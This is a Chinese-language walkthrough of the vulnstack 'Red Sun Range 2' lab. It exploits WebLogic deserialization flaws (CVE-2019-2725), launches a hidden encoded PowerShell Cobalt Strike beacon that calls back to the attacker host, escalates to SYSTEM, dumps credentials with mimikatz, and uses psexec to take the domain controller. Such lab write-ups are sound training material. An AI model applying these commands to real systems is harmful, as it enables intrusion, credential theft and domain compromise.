【红日靶场二】渗透测试全过程
红日靶场二
一、准备工作
下载网址:http://vulnstack.qiyuanxuetang.net/vuln/detail/3/xia
下载完成后有三台虚拟机 一台是DC域控制器 一台是PC 还有WEB服务器密码都是 1qaz@WSX
使用工具:kali cs java反序列化工具 weblogicscan
双网卡模拟外网内网服务器
配置如下:
服务器 | 外网 | 内网 | |
---|---|---|---|
PC win7 | 192.168.159.201 | 10.10.10.201 | 客户机 |
DC | 不出网 | 10.10.10.10 | 域控器 |
web服务器 win2008 server | 192.168.159.44 | 10.10.10.80 | web服务器 |
kali | 192.168.159.128 | null | 攻击机 |
配置完成后启动三台服务器
启动web服务器:登录web服务器时注意使用administrator 登录 然后修改密码为1qaz@WSX
来到这个目录下启动 weblogicstart.cmd
二、信息收集
使用nmap探测主机存活
1 | nmap -T4 -sP 192.168.159.1/24 |
发现存活ip
192.168.159.44端口扫描
端口扫描:
1 | nmap -T4 -sS 192.168.159.1 |
发现开有7001端口 对应服务weblogic
三、漏洞扫描
发现使用的服务是 weblogic 10.3
使用weblogic漏洞扫描工具
1 | python WeblogicScan.py -u 192.168.159.44 -p 7001 |
发现漏洞:CVE-2017-3506 CVE-2019-2725 两个都是反序列化漏洞
1 | [-] [192.168.159.44:7001] weblogic not detected CVE-2016-3510 |
四、漏洞利用
漏洞检测与利用
利用CVE-2019-2725 执行命令
1 | java -jar Java反序列化漏洞利用工具V1.7.jar |
检测漏洞:
执行命令:
CS生成木马
kali启动CS:
1 | ./teamserver 192.168.159.128 123 |
本机连接客户端
生成powershell - cmd马 前一步先创建一个监听 选择kali的IP 端口是8888
CS上线
在Java漏洞工具上执行
1 | powershell -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQ....这里是你生成的木马 |
CS成功上线
五、权限提升
使用SVC提权脚本
权限提权成功system权限
1 | [+] host called home, sent: 285834 bytes |
六、内网信息收集
查看内网IP
1 | shell ipconfig /all |
发现他的内网IP是10.10.10.80
查看域环境
查看域管理员
端口扫描portscan
1 | portscan 10.10.10.80 1-1024,3389,5900-6000 none 1024 |
发现445端口都在开放 可以试试永恒之蓝之类的
密码获取minikitz
直接运行run minikitz
七、横向移动
sExec是一种轻量级的telnet替代品,可以在其他系统上执行进程,完成控制台应用程序的完全交互,而无需手动安装客户端软件。PsExec强大的用途是在远程系统上启动交互式命令提示,远程启动执行包括IpConfig等cmd命令,故能够远程启动服务器上程序、脚本
SMB横向移动 使用 psexec64
拿下DC域控制器
使用psexec_psh 拿下PC权限
结束三台机器全都是system权限